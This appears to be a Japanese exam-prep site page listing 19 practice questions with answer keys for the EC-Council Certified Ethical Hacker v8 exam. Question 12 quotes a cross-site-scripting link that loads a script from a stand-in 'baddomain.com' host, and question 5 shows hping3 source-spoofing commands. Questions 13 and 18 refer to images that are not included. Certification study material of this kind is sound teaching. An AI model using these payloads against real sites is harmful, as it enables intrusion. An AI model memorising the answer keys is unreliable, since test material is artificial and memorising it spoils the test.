次の認定試験に速く合格する！

簡単に認定試験を準備し、学び、そして合格するためにすべてが必要だ。

312-50v8 無料問題集「EC-COUNCIL Certified Ethical Hacker v8」

ページ: 1 / 47
トータル 880 問

サインアップ、ログインされた後に、試験全体を無料で表示できるようになります。

質問 1

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?

（A）Block UDP at the firewall

（B）Block TCP at the firewall

（C）Block ICMP at the firewall

（D）There is no way to completely block tracerouting into this area

正解：D 解答を投票する

質問 2

The use of technologies like IPSec can help guarantee the followinG. authenticity, integrity, confidentiality and

（A）operability.

（B）usability.

（C）non-repudiation.

（D）security.

正解：C 解答を投票する

質問 3

One of your junior administrator is concerned with Windows LM hashes and password cracking. In your discussion with them, which of the following are true statements that you would point out?
Select the best answers.

（A）Enforcing Windows complex passwords is an effective countermeasure.

（B）BY using NTLMV1,you have implemented an effective countermeasure to password cracking.

（C）John the Ripper can be used to crack a variety of passwords,but one limitation is that the output doesn't show if the password is upper or lower case.

（D）SYSKEY is an effective countermeasure.

（E）If a Windows LM password is 7 characters or less,the hash will be passed with the following characters,in HEX- 00112233445566778899.

正解：A、C、D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 4

A pentester gains acess to a Windows application server and needs to determine the settings of the built-in Windows firewall. Which command would be used?

（A）WMIC firewall show config

（B）Net firewall show config

（C）Ipconfig firewall show config

（D）Netsh firewall show config

正解：D 解答を投票する

質問 5

Perimeter testing means determining exactly what your firewall blocks and what it allows. To conduct a good test, you can spoof source IP addresses and source ports. Which of the following command results in packets that will appear to originate from the system at 10.8.8.8? Such a packet is useful for determining whether the firewall is allowing random packets in or out of your network.

（A）hping3 -O 10.8.8.8 -S server -c 2 -p 80

（B）hping3 -T 10.8.8.8 -S netbios -c 2 -p 80

（C）hping3 -Y 10.8.8.8 -S windows -c 2 -p 80

（D）hping3 -a 10.8.8.8 -S springfield -c 2 -p 80

正解：D 解答を投票する

質問 6

You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250.
Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server?

（A）120-321

（B）121-231

（C）120-370

（D）121-371

（E）200-250

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 7

A distributed port scan operates by:

（A）Blocking access to the targeted host by each of the distributed scanning clients

（B）Using denial-of-service software against a range of TCP ports

（C）Having multiple computers each scan a small number of ports,then correlating the results

（D）Blocking access to the scanning clients by the targeted host

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 8

Which of the following problems can be solved by using Wireshark?

（A）Checking creation dates on all webpages on a server

（B）Troubleshooting communication resets between two systems

（C）Tracking version changes of source code

（D）Resetting the administrator password on multiple systems

正解：B 解答を投票する

質問 9

Vulnerability scanners are automated tools that are used to identify vulnerabilities and misconfigurations of hosts. They also provide information regarding mitigating discovered vulnerabilities.

Which of the following statements is incorrect?

（A）Vulnerability scanners can help identify out-of-date software versions,missing patches,or system upgrades

（B）They can validate compliance with or deviations from the organization's security policy

（C）Vulnerability scanners can identify weakness and automatically fix and patch the vulnerabilities without user intervention

（D）Vulnerability scanners attempt to identify vulnerabilities in the hosts scanned.

正解：C 解答を投票する

質問 10

Bill is a security analyst for his company. All the switches used in the company's office are Cisco switches. Bill wants to make sure all switches are safe from ARP poisoning. How can Bill accomplish this?

（A）Bill can use the command: ip dhcp snooping.

（B）He could use the command: ip arp no snoop.

（C）Bill could use the command: ip arp no flood.

（D）Bill can use the command: no ip snoop.

正解：A 解答を投票する

質問 11

After a client sends a connection request (SYN) packet to the server, the server will respond (SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) by the client. This sequence number is predictable; the attack connects to a service first with its own IP address, records the sequence number chosen, and then opens a second connection from a forged IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but can guess the correct responses. If the source IP address is used for authentication, then the attacker can use the one-sided communication to break into the server. What attacks can you successfully launch against a server using the above technique?

（A）Session Hijacking attacks

（B）Web page defacement attacks

（C）IP spoofing attacks

（D）Denial of Service attacks

正解：A 解答を投票する

質問 12

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.
<ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/bad script.js%22%3E%3C/script%3E">See foobar</a>
What is this attack?

（A）SQL Injection

（B）Cross-site-scripting attack

（C）URL Traversal attack

（D）Buffer Overflow attack

正解：B 解答を投票する

質問 13

What type of Virus is shown here?

（A）Macro Virus

（B）Metamorphic Virus

（C）Sparse Infector Virus

（D）Cavity Virus

（E）Boot Sector Virus

正解：D 解答を投票する

質問 14

An NMAP scan of a server shows port 25 is open. What risk could this pose?

（A）Clear text authentication

（B）Active mail relay

（C）Web portal data leak

（D）Open printer sharing

正解：B 解答を投票する

質問 15

Your lab partner is trying to find out more information about a competitors web site. The site has a .com extension. She has decided to use some online whois tools and look in one of the regional Internet registrys. Which one would you suggest she looks in first?

（A）RIPE

（B）ARIN

（C）AfriNIC

（D）APNIC

（E）LACNIC

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 16

Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored? (Choose the best answer)

（A）hashing algorithms

（B）asymmetric algorithms

（C）integrity algorithms

（D）symmetric algorithms

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 17

On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned. How is it possible to list processes and uids associated with them in a more reliable manner?

（A）Use "echo"

（B）Use "Is"

（C）Use "netstat"

（D）Use "lsof"

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 18

Take a look at the following attack on a Web Server using obstructed URL:

How would you protect from these attacks?

（A）Configure the Web Server to deny requests involving "hex encoded" characters

（B）Create rules in IDS to alert on strange Unicode requests

（C）Enable Active Scripts Detection at the firewall and routers

（D）Use SSL authentication on Web Servers

正解：B 解答を投票する

質問 19

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called?

（A）Company Compliance Policy (CCP)

（B）Penetration Testing Policy (PTP)

（C）Information Audit Policy (IAP)

（D）Information Security Policy (ISP)

正解：D 解答を投票する

ページ: 1 / 47
トータル 880 問

312-50v8 の機能をすべて解除する

キャプチャ不要
365日無料更新サービス
希望する合格率を設定できる
時間の割り当てられる（時間：分）
312-50v8 に2つの練習用モード
サポートサービス対応

完全版を入手する

弊社を連絡する

我々は１２時間以内ですべてのお問い合わせを答えます。

オンラインサポート時間：( UTC+9 ) 9:00-24:00
月曜日から土曜日まで

サポート：現在連絡

トップ試験

C_SIGDA_2403 試験問題集
SC-200 試験問題集
CFPE 試験問題集
JN0-280 試験問題集
1z1-902 試験問題集
EX200 試験問題集

312-50v8 無料問題集「EC-COUNCIL Certified Ethical Hacker v8」

弊社を連絡する

関連リンク

トップ試験